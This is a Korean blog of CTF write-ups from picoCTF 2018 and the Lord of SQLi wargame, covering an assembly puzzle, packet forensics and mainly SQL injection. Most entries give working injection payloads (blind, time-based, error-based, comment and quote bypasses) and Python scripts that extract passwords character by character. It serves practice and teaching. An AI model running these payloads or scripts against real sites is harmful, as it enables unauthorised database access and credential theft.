Hubeen's Home

[picoCTF] assembly-0

문승현 (허빈) — Thu, 18 Oct 2018 03:03:09 +0900

이 문제는 어셈블리어를 얼마나 이해를 하느냐를 묻는 문제이다.

intel_syntax noprefix

.bits 32

.global asm0

asm0:

push ebp

mov ebp,esp

mov eax,DWORD PTR [ebp+0x8]

mov ebx,DWORD PTR [ebp+0xc]

mov eax,ebx

mov esp,ebp

pop ebp

ret

ebp + 0x8 = argv[1]

ebp + 0xc = argv[2]

mov eax, ebx로 ebx 값을 eax에 넣는것을 볼 수 있다.

eax는 리턴값이다.

[picoCTF] admin panel

문승현 (허빈) — Thu, 18 Oct 2018 03:00:11 +0900

이 문제는 포렌식 문제로서 패킷을 분석하는 문제이다.

허나 문제에서 트래픽을 캡쳐했고 어드민 패널에 로그인을 한 패킷이라고 한다.

그렇다면 http 프로토콜로 찾으면 쉽게 필터를 할 수 있을 것이라 추측하였다.

수 많은 패킷 중에서 유일하게 통신하는 것들만 남았다.

POST 메소드로 login에 패킷을 쏜것을 발견할 수 있다.

플래그를 얻을 수 있었다.

[picoCTF] A Simple Question

문승현 (허빈) — Thu, 18 Oct 2018 02:53:28 +0900

이 문제는 blind injection 기법으로 answer의 값을 가져와 인증을 하면 되는 문제이다.

먼저 길이는 아래의 쿼리로 가져올 수 있다.

a' or length(answer)=5 -- -

코드를 작성하여 편하게 가져왔다.

import requests

import json

length = 0

url = 'http://2018shell3.picoctf.com:2644/answer2.php';

headers = {'User-Agent': 'Mozilla/5.0'}

for i in range(1, 50):

param = {'answer' : "a' or length(answer)=" + str(i) + " -- -", 'debug':0}

rs = requests.post(url, data=param ,headers=headers)

text = rs.text

print(str(i) + "start")

if("You are so close." in text):

length = i

break

print("find length=" + str(length))

그 후 answer의 값을 가져오는 방법은 아래의 쿼리로 가져올 수 있다.

a' or length(answer)=14 and Unicode(substr(answer, 1, 1))=41 -- -

이 역시 편하게 코드를 작성하여 처리했다.

exploit.py

import requests

import json

length = 0

url = 'http://2018shell3.picoctf.com:2644/answer2.php';

headers = {'User-Agent': 'Mozilla/5.0'}

for i in range(1, 50):

param = {'answer' : "a' or length(answer)=" + str(i) + " -- -", 'debug':0}

rs = requests.post(url, data=param ,headers=headers)

text = rs.text

print(str(i) + "start")

if("You are so close." in text):

length = i

break

print("find length=" + str(length))

flag = ""

for i in range(1, length+1):

print("start " + str(i))

for c in range(48,125):

param = {'answer' : "a' or length(answer)=14 and unicode(substr(answer," + str(i) + ",1))=" + str(c) + " -- - ", 'debug': 0}

rs = requests.post(url, data=param, headers=headers)

text = rs.text

if("Wrong." in text):

continue

else:

print("find " + chr(c))

flag += chr(c)

break

print(flag)

[LOS1] umaru

문승현 (허빈) — Thu, 27 Sep 2018 23:17:03 +0900

이 문제는 flag를 알아내면 되는 문제이다.

허나 실제 플래그와 입력한 플래그가 틀린다면 리셋을 해버린다.

$new_flag = substr(md5(rand(10000000,99999999)."qwer".rand(10000000,99999999)."asdf".rand(10000000,99999999)),8,16);

ㅇㅇ;;

update문을 에러를 띄워서 찾아내면 대는거시다.

그렇다면 update문은 실제로 실행이 되지 않고 리셋이 되지 않는것이다.

하지만 맞는지 안맞는지를 어떻게 알아야할지가 문제였다.

방법은 sleep을 통해 리퀘스트 받은 시간으로 하면 대는거시여따.

sleep(0) 일 경우 select 1 union select 2를 이용하여 에러를 띄워주는 식인것이다.

맞으면 sleep(3)이 되어 실행이 대는거시다

import requests

import time

url = "https://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php"

headers = {'User-Agent': 'Mozilla/5.0'}

cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}

'''

?flag=sleep(2*(length(flag)=1)) | (select 1 union select 2) -- -

'''

length = 16

strs = ""

for i in range(1, 50):

start = time.time()

rs = requests.get(url + "?flag=sleep(2*(length(flag)=" + str(i) + "))%20||%20(select%201%20union%20select%202)%20--%20-", headers=headers, cookies=cookies)

if((time.time()-start) > 2):

print("find it length = " + str(i))

length = i

break

for i in range(1, length+1):

print(str(i) + " start !")

for c in range(48, 127):

start = time.time()

rs = requests.post(url + "?flag=sleep(2*(flag%20like%20%27" + strs + chr(c) + "%%27))%20||%20(select%201%20union%20select%202)%20--%20-", headers=headers, cookies=cookies)

if((time.time()-start) >2):

print(str(i) + " find it " + str(c) + " " + chr(c))

strs += chr(c)

break

print(strs)

[LOS1] black_eyes

문승현 (허빈) — Thu, 27 Sep 2018 02:59:41 +0900

이 문제는 if문이 막혀있었다.

그래서 검색을 해보니 union으로 거짓일 경우와 참일 경우를 비교하는 방법을 찾아냈다.

이것을 이용해서 이전 문제와 비슷하게 풀어냈다.

import requests

url = "https://los.eagle-jump.org/dark_eyes_a7f01583a2ab681dc71e5fd3a40c0bd4.php"

headers = {'User-Agent': 'Mozilla/5.0'}

cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}

'''

?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20length(pw)=8%20union%20select%201)--%20-

'''

length = 0

for i in range(1,100):

rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20length(pw)=" + str(i) + "%20union%20select%201)--%20-", headers=headers, cookies=cookies)

text = rs.text

if("query" in text):

print("find it length = " + str(i))

length = i

break

# get length

for i in range(1, length+1):

for c in range(33, 255):

rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20(select%20ord(substr(pw, " + str(i) + ",1))="+ str(c) +"%20union%20select%201)--%20-", headers=headers, cookies=cookies)

text = rs.text

if("query" in text):

print(str(i) + " find it " + str(c) + " " + chr(c))

break

[LOS1] iron_golem

문승현 (허빈) — Thu, 27 Sep 2018 01:49:53 +0900

이 문제는 애들한테 말로만 듣던 에러 기반 블라인드 인젝션 문제임을 파악할 수 있었다.

그저 쿼터 하나 넣었는데 에러가 뜨길래 파악을 할 수 있었다.

select * from table where 1 and if(1=1,1,(select 1 union select 2))

select * from table where 1 and if(1=2,1,(select 1 union select 2))

첫번째 예제는 if 절이 1=1 로 참이 되면서 단순히 1을 반환한다.

두번째 예제는 if 절이 거짓이 되면서 select 1 union select 2 라는 쿼리를 실행하게 되고,

서브쿼리에서 복수의 값을 반환하면서 에러가 발생하게 된다. (thx to hellsonic)

http://hackerschool.org/Sub_Html/HS_Posting/?uid=43

글을 읽고 풀었다.

너모 감사드린다.

import requests

url = "https://los.eagle-jump.org/iron_golem_d54668ae66cb6f43e92468775b1d1e38.php"

headers = {'User-Agent': 'Mozilla/5.0'}

cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}

'''

?pw=1234%27%20or%20id=%27admin%27%20and%20%20if((length(pw)=16),1,(select%201%20union%20select%202));%20%23%20

error : Subquery returns more than 1 row

'''

length = 0

for i in range(1,100):

rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20%20if((length(pw)=" + str(i) + "),1, (select%201%20union%20select%202));%20%23%20", headers=headers, cookies=cookies)

text = rs.text

if("Subquery returns more than 1 row" in text):

pass

else:

print("find it length = " + str(i))

length = i/4

break

# get length

for i in range(1, i+1):

for c in range(33, 255):

rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20%20if((ord(substr(pw,"+ str(i) +",1))="+ str(c) +",1,(select%201%20union%20select%202));%20%23%20", headers=headers, cookies=cookies)

text = rs.text

if(not "Subquery returns more than 1 row" in text):

print(str(i) + " find it " + str(c))

break

유니코드이기때문에 /4를 해주었다.

[LOS1] dragon

문승현 (허빈) — Sat, 22 Sep 2018 22:54:46 +0900

이 문제는 우리는 pw를 입력하지만 앞에서 주석처리가 되어있었다;;

뭐 줄넘김 같은게 되지 않을까해서 \n을 넣어보고 했는데

%0a가 있음을 깨달았다.

?pw=qwer%27%20%0a%20and%20pw=%27%27%20or%20id=%27admin

[LOS1] xavis

문승현 (허빈) — Sat, 22 Sep 2018 22:51:24 +0900

이 문제는 정말 좋은 경험을 했다고 생각한다.

?pw=1234%27%20or%20id=%27admin%27%20%20and%20length(pw)=40%23

40글자라고 해서 좀 놀랐다.

허나 ascii(substr(pw,1,1)) 로 돌려보자 모든 값들이 0으로 나오는 것을 보고 유니코드임을 파악할 수 있었다.

유니코드는 4바이트로서 40/4를 하여 총 10글자임을 알 수 있었다.

유니코드는 ord 함수를 이용하여 뽑아내었따

import requests

url = "https://los.eagle-jump.org/xavis_fd4389515d6540477114ec3c79623afe.php"

headers = {'User-Agent': 'Mozilla/5.0'}

cookies = {'PHPSESSID':'25g6h0pbijn3arrdalpfkie222'}

'''

?pw=1234%27%20or%20id=%27admin%27%20%20and%20right(left(pw,1),1)=%27a%27%23

?pw=1234%27%20or%20id=%27admin%27%20and%20ascii(substr(pw,%201,%201))%20=%2010%20%23

'''

for x in range(10):

for c in range(33, 255):

rs = requests.get(url + "?pw=1234%27%20or%20id=%27admin%27%20and%20ord(substr(pw,%20" + str(x) + ",%201))%20=%20" + str(c) + "%20%23", headers=headers, cookies=cookies)

text = rs.text

if("<h2>Hello admin</h2>" in text):

print(str(x+1) + " ascii = " + str(c) + " find it")

[LOS1] nightmare

문승현 (허빈) — Sat, 22 Sep 2018 22:49:20 +0900

이 문제는 mysql 에서 문자열은 0이 된다.

?pw=%27)=0;%00

0=0은 true이기에 조건이 맞아서 출력이 댄다.

SELECT 'a' = 0 — TRUE

SELECT 'abc' = 0 — TRUE

SELECT '1' = 0 — FALSE

SELECT '123' = 0 — FALSE

SELECT 'x1' = 0 — TRUE

SELECT '1x' = 0 — FALSE

SELECT '1x' = 1 — TRUE

SELECT '12x1' = 0 — FALSE

SELECT '12x1' = 121 — FALSE

SELECT '12x1' = 12 — TRUE

[LOS1] succubus

문승현 (허빈) — Sat, 22 Sep 2018 22:38:25 +0900

이 문제는 싱글쿼터를 못 넣는다...

허나 생각해보니 저 쿼터를 문자열로 인식하게 되면 대는거시다.

그리고 무조건 True로 만들어서 아무 아이디나 뜨게 하면 되는거시다.

?id=\&pw=%20||%201=1%20%23